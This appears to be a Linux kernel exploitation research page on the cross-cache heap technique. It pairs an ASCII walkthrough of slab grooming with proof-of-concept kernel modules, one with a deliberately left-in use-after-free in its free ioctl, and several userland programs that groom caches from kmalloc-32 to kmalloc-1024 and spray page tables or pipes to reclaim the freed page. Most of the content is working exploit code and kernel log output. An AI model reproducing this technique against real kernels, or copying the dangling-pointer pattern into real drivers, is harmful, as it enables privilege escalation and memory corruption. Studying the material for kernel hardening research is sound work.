cross-cache https://github.com/Yayoi-cs/cross-cache
Theory Order-n slab system (not so important)
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― ... ―――― page ―――― page (2^10 pages)
page ―――― page ―――― ... ―――― page ―――― page (2^10 pages)
1. allocate (cpu_partial+1) * objs_per_slab
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab 2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
2. allocate objs_per_slab - 1
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────IDLE
3. allocate victim object
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────UAF OBJECT
4. allocate objs_per_slab + 1 With this part, we can make sure that page which contain free must become freed with freeing object[victim-objs_per_slab] ~ object[victim+objs_per_slab].
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────UAF OBJECT
slab N+3 ─────────── full page
5. free victim object
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ──────── UAF OBJECT(freed)
slab N+3 ─────────── full page
6. free object in the victim's page make UAF page empty
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── freed ─────────── ... UAF OBJECT(freed)
7. free one object from each page allocated in step 1
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab 2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab N ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── freed ─────────── ... UAF OBJECT(freed)
PoC (strategy 1)
#include <asm-generic/errno.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <linux/ioctl.h>
#include <linux/mm.h>
#define DEVICE_NAME "tsune"
#define IOCTL_CMD_POC 0x810
#define MSG_SZ 256
static struct kmem_cache *tsune_cache;
// /sys/kernel/slab/tsune_cache/
struct user_req {
unsigned int cpu_partial;
unsigned int objs_per_slab;
unsigned int object_size;
};
static long tsune_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
struct user_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { return -EFAULT; }
if (cmd != IOCTL_CMD_POC) { return -EINVAL; }
printk(KERN_INFO "tsune: PoC Invoked\n");
printk(KERN_INFO "tsune: cpu_partial=%u, objs_per_slab=%u\n", req.cpu_partial, req.objs_per_slab);
unsigned int total =
(req.cpu_partial + 1) * req.objs_per_slab
+ (req.objs_per_slab - 1)
+ 1
+ (req.objs_per_slab + 1);
unsigned long *list = kmalloc(sizeof(unsigned long) * total, GFP_KERNEL);
unsigned long *head = list;
printk(KERN_INFO "tsune: 1. allocate (cpu_partial+1)*objs_per_slab\n");
for (int i = 0; i < (req.cpu_partial + 1) * req.objs_per_slab; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 2. allocate objs_per_slab-1\n");
for (int i = 0; i < req.objs_per_slab - 1; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 3. allocate uaf object\n");
unsigned long *uaf_obj = list;
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
printk(KERN_INFO "tsune: 4. allocate objs_per_slab+1\n");
for (int i = 0; i < req.objs_per_slab + 1; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 5. free uaf object\n");
kmem_cache_free(tsune_cache, (void *)(*uaf_obj));
printk(KERN_INFO "tsune: 6. make page which has a uaf object empty\n");
for (int i = 1; i < req.objs_per_slab; i++) {
kmem_cache_free(tsune_cache, (void *)(uaf_obj[i]));
kmem_cache_free(tsune_cache, (void *)(uaf_obj[-i]));
}
printk(KERN_INFO "tsune: 7. free one object per page\n");
for (int i = 0; i < (req.cpu_partial + 1) * req.objs_per_slab; i += req.objs_per_slab) {
kmem_cache_free(tsune_cache, (void *)(head[i]));
}
printk(KERN_INFO "tsune: uaf object: %lx\n", *uaf_obj);
unsigned long uaf_page = *uaf_obj & (~0xfff);
unsigned order = get_order(req.object_size * req.objs_per_slab);
printk(KERN_INFO "tsune: uaf page: %lx\n", uaf_page);
printk(KERN_INFO "tsune: uaf page order: %u\n", order);
void *new_page = alloc_pages(GFP_KERNEL, order);
void *new_page_ptr = page_address((struct page *)new_page);
printk(KERN_INFO "tsune: new page: %lx\n", (unsigned long)new_page_ptr);
if ((unsigned long)new_page_ptr == uaf_page) {
printk(KERN_INFO "tsune: cross-cache succeed!\n");
} else {
printk(KERN_INFO "tsune: cross-cache failed!\n");
}
return 0;
}
static struct file_operations tsune_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = tsune_ioctl,
};
static struct miscdevice tsune_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = DEVICE_NAME,
.fops = &tsune_fops,
};
static int __init tsune_init(void) {
if (misc_register(&tsune_device)) { return -ENODEV; }
tsune_cache = kmem_cache_create("tsune_cache", MSG_SZ, 0, SLAB_HWCACHE_ALIGN, NULL);
if (!tsune_cache) {
return -ENOMEM;
}
return 0;
}
static void __exit tsune_exit(void) {
kmem_cache_destroy(tsune_cache);
misc_deregister(&tsune_device);
}
module_init(tsune_init);
module_exit(tsune_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("tsune");
MODULE_DESCRIPTION("load to kernel heap master");
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_POC 0x810
/*
~ # cat /sys/kernel/slab/tsune_cache/object_size
256
~ # cat /sys/kernel/slab/tsune_cache/objs_per_slab
16
~ # cat /sys/kernel/slab/tsune_cache/cpu_partial
52
*/
struct user_req {
unsigned int cpu_partial;
unsigned int objs_per_slab;
unsigned int object_size;
};
int main(void) {
info("cross-cache poc");
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
struct user_req req;
req.cpu_partial = 256;
req.objs_per_slab = 16;
req.object_size = 52;
SYSCHK(ioctl(fd, IOCTL_CMD_POC, &req));
}
# dmesg
...
[ 8.497624] tsune: PoC Invoked
[ 8.497680] tsune: cpu_partial=256, objs_per_slab=16
[ 8.497749] tsune: 1. allocate (cpu_partial+1)*objs_per_slab
[ 8.501343] tsune: 2. allocate objs_per_slab-1
[ 8.501440] tsune: 3. allocate uaf object
[ 8.501460] tsune: 4. allocate objs_per_slab+1
[ 8.501502] tsune: 5. free uaf object
[ 8.501522] tsune: 6. make page which has a uaf object empty
[ 8.501590] tsune: 7. free one object per page
[ 8.501716] tsune: uaf object: ffff89ff822f3d00
[ 8.501743] tsune: uaf page: ffff89ff822f3000
[ 8.501756] tsune: uaf page order: 0
[ 8.501783] tsune: new page: ffff89ff822f3000
[ 8.501799] tsune: cross-cache succeed!
PoC for most of the kernel allocator 🤔
module summary
what I did
module
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <linux/ioctl.h>
#define DEVICE_NAME "tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 512
struct user_req {
int idx;
char *userland_buf;
};
char *ptrs[1024];
static struct kmem_cache *tsune_cache;
static long tsune_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
struct user_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) {
return -EFAULT;
}
if (req.idx < 0 || req.idx >= 1024) {
return -EINVAL;
}
switch(cmd) {
case IOCTL_CMD_ALLOC:
ptrs[req.idx] = kmem_cache_alloc(tsune_cache, GFP_KERNEL);
printk("%x: %lx\n",req.idx,(unsigned long)ptrs[req.idx]);
if (!ptrs[req.idx]) {
return -ENOMEM;
}
break;
case IOCTL_CMD_FREE:
if (ptrs[req.idx]) {
kmem_cache_free(tsune_cache, ptrs[req.idx]);
//ptrs[req.idx] = NULL;
}
break;
case IOCTL_CMD_READ:
if (ptrs[req.idx]) {
if (copy_to_user(req.userland_buf, ptrs[req.idx], MSG_SZ)) {
return -EFAULT;
}
}
break;
case IOCTL_CMD_WRITE:
if (ptrs[req.idx]) {
if (copy_from_user(ptrs[req.idx], req.userland_buf, MSG_SZ)) {
return -EFAULT;
}
}
break;
case IOCTL_CMD_PAGE:
if (ptrs[req.idx]) {
if (copy_to_user(req.userland_buf, (char *)((unsigned long)(ptrs[req.idx])&(~0xfff)), MSG_SZ)) {
return -EFAULT;
}
}
break;
default:
return -EINVAL;
}
return 0;
}
static struct file_operations tsune_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = tsune_ioctl,
};
static struct miscdevice tsune_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = DEVICE_NAME,
.fops = &tsune_fops,
};
static int __init tsune_init(void) {
if (misc_register(&tsune_device)) { return -ENODEV; }
tsune_cache = kmem_cache_create("tsune_cache", MSG_SZ, 0, SLAB_HWCACHE_ALIGN, NULL);
if (!tsune_cache) {
return -ENOMEM;
}
return 0;
}
static void __exit tsune_exit(void) {
kmem_cache_destroy(tsune_cache);
misc_deregister(&tsune_device);
}
module_init(tsune_init);
module_exit(tsune_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("tsune");
MODULE_DESCRIPTION("load to kernel heap master");
kmemcache-1024
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 1024
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 1024
#define OBJS_PER_SLAB 8
#define CPU_PARTIAL 24
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-1024");
//size_t size = 4*1024*1024;
size_t size = PAGE_SZ;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
#define N_PIPE 0x80
int **pipe_ptrs = alloc_pipe(N_PIPE);
rep(i,N_PIPE) {
pipe_write(pipe_ptrs[i],"A",1);
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-512
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 512
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 512
#define OBJS_PER_SLAB 8
#define CPU_PARTIAL 52
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-512");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-256
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 256
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 256
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 52
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-1024");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-128
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 128
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 128
#define OBJS_PER_SLAB 32
#define CPU_PARTIAL 120
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-128");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-32
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 32
struct user_req {
int idx;
char *userland_buf;
};
#define OBJS_PER_SLAB 128
#define CPU_PARTIAL 120
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-32");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global=0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free one object per page")
rep(i,CPU_PARTIAL+1) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free uaf object")
ioctl_free(fd,uaf_idx);
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
rep(i,0x1) {
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80+i, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
/*
-serial tcp:127.0.0.1:9999,server,nowait \
-gdb tcp::12345 \
*/
Last modified: 04 December 2025